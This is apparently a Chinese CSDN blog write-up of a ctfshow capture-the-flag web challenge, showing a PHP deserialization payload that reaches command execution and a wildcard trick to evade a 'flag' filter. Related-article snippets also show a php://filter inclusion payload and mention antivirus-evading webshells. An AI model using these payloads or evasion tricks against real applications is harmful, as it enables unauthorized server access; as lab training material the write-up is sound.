ctfshow菜狗杯webshell wp

最新推荐文章于 2024-06-14 18:15:48 发布
最新推荐文章于 2024-06-14 18:15:48 发布
阅读量778 收藏 1
点赞数
分类专栏: CTF-WEB 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/128271545
版权

启动环境
在这里插入图片描述
大致看一下利用顺序
反序列化传入的cmd值
调用__construct方法
调用init方法
调用exec
任意命令执行

那么构造语句如下

$poc = new Webshell();
$poc->cmd='ls';
echo serialize($poc);

在这里插入图片描述
先ls看看
在这里插入图片描述
读取就行了
注意到正则匹配过滤了flag
可以考虑模糊匹配,闭合等绕过

O:8:"Webshell":1:{s:3:"cmd";s:6:"tac f*";}
丨Arcueid丨
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
陇剑杯webshell.zip 解压密码GAME
09-28
陇剑杯webshell.zip 解压密码GAME
2016最新php免杀webshell过安全狗
03-05
【2016年的测试】:描述中提到这个Webshell在2016年经过测试可以成功绕过安全狗,这可能是因为当时的安全狗检测规则相对简单,或者这个Webshell采用了当时较为新颖的免杀技术。 【文件名称列表】:只有一个名为...
ctfshow菜狗 web webshell
hypocrite2的博客
05-18 450
Webshell是一种恶意脚本,可以上传到Web服务器上,以获取未经授权的访问和对服务器的控制。如果通过GET请求传递了名为 cmd 的参数,代码将尝试对参数进行反序列化,并调用 $unserializecmd->init() 方法。否则,代码将显示自身的源代码。如果条件为真,则调用 exec() 方法,传递 $cmd 的值。了解到它的格式,字母O,8位,“Webshell”,1,s,3位,cmd,s,位数,“真正想执行的命令”__construct() 方法是类的构造函数,它调用 init() 方法。
【CTFSHOW_菜狗杯Webshell
qq_48932191的博客
01-20 523
Webshell类复制出来,然后改一下要运行的cmd。这里因为题中过滤了flag所以用通配符“*”替代。反序列化,输入字符串经过反序列化实现命令执行。
CTFSHOW 菜狗杯 Webshell 解题思路和方法
最新发布
weixin_58052886的博客
06-14 373
分析代码,我们输入的参数名为 cmd,同时将传入的参数值首先进行反序列化操作,然后执行 init() 函数发现在反序列化之后。此时我们可以在构造反序列化语句中使用cmd命令。需要注意的是,这里我们不能使用"cat flag.php"命令,因为代码中有匹配判断,我们的代码中不能出现flag ,/i 表示忽略大小写。我们重新将cmd赋值为 “tac f* ”,并运行代码进行序列化:(也可以直接修改,只需要修改命令和对应的字符长度即可)利用序列的结果构造url语句,并测试。
CTFSHOW-WEB详解
qq_49422880的博客
05-25 4803
CTFSHOW-WEB详解一、WEB13--文件上传二、WEB-红包题第二弹 一、WEB13–文件上传   开始的界面就是文件上传,确定方向为文件上传漏洞分析,尝试上传文件,我上传的第一个文件是一个文本文件很小只有9个字节,就上传成功了直接,还以为会按往常一样出现绝对路径又或者提示只能上传别的格式文件,然后我们通过绕过,接着使用蚁剑连接直接看文件拿到flag。   然而。。。。。。   简单的信息泄露例子,看完绝对不亏.   事情没有我们想的那么简单,我上传一个webshell的时候,发现内容超过了大小,又
CTFshow 菜狗杯 web方向 全
Jay17的博客
09-01 2545
CTFshow 菜狗杯 web方向 全
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
2016最新aspx免杀webshell过安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
强大的webshell管理工具-哥斯拉
12-27
标题中的“强大的webshell管理工具-哥斯拉”指的是一个名为“哥斯拉”的软件工具,它是专门设计用于管理和控制Webshell的。Webshell是一种在Web服务器上运行的后门程序,通常由黑客植入,以远程控制服务器或执行恶意...
CTFSHOW 菜狗杯--WEB
weixin_45908624的博客
01-09 3053
CTFShow--菜狗杯--web
CTFshow 2022 菜狗杯 WEB WP补充
starttv的博客
11-14 1975
得到源码,分析发现push会将自定义内容md5加密之后作为文件名上传到/plugins/目录上,内容可控。先给number2赋字母,会出现一个报错界面,给number1和operator赋的话会提示错误,应该是这两个参数有过滤,而number2没有。在控制台输入Game回车,把score修改,然后回到游戏点击开始,只要吃掉一个苹果你就会发现分数已经修改成功。分析源码,发现它将文件名拼接到了cmd里,没有进行任何过滤,可以在文件后传入命令。flag=0,发现内容为空,尝试把flag=0改为1,得到。
CTFshow 2022 菜狗杯部分WEB WP
starttv的博客
11-13 1771
右键发现js源代码,将js代码全部复制下来,放在js在线运行工具里,在最后加上g1ve_flag();访问/secret_path_you_do_not_know/secretfile.txt。extract() 函数从数组中将变量导入到当前的符号表。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数使用数组键名作为变量名,使用数组键值作为变量值。套娃题,自己本地搭环境,慢慢试就试出来了。可以实现任意文件下载,除了flag。把这里的修改即可得到flag。检查源代码发现存在文件下载。
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4182
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
CTFshow 菜狗杯 部分wp
weixin_44770698的博客
02-04 2137
ctfshow 菜狗杯 web部分练习(暂时不全)
ctfshow【菜狗杯wp
leekos的博客,分享web安全相关知识~
03-07 1524
ctfshow【菜狗杯wp
ctfshow(菜狗杯
qq_62046696的博客
11-28 5729
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
ctfshow菜狗杯webwp
qq_63928796的博客
11-14 2113
比如b=cookie[a],所以post[b]然后令post等于c所以get[c],令get=d所以request[d]最后补上前面的数字就是request[d],最后执行的就是eval(d[6][0][7][5][8][0][9][4][4]);可以看到源码对于输入的限制是两个正则,要求要么是数字,要么是dir(gmpy2)中的内容。根据源码可知,address是用AES的ECB模式加密的,稍微查一下就可以知道,ECB模式一组密文对应一组明文,也就是说,可以通过改变密文的顺序从而改变解密后明文的顺序。
ctfshow菜狗杯webshll
09-04
CTFShow菜狗杯是一个CTF竞赛,而Webshll据我所了解是一个WebShell工具。WebShell是一种用于远程管理和控制网站的工具,但它也可能被黑客用于非法活动。对于具体的CTF比赛内容以及相关工具的使用和提权信息,我无法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值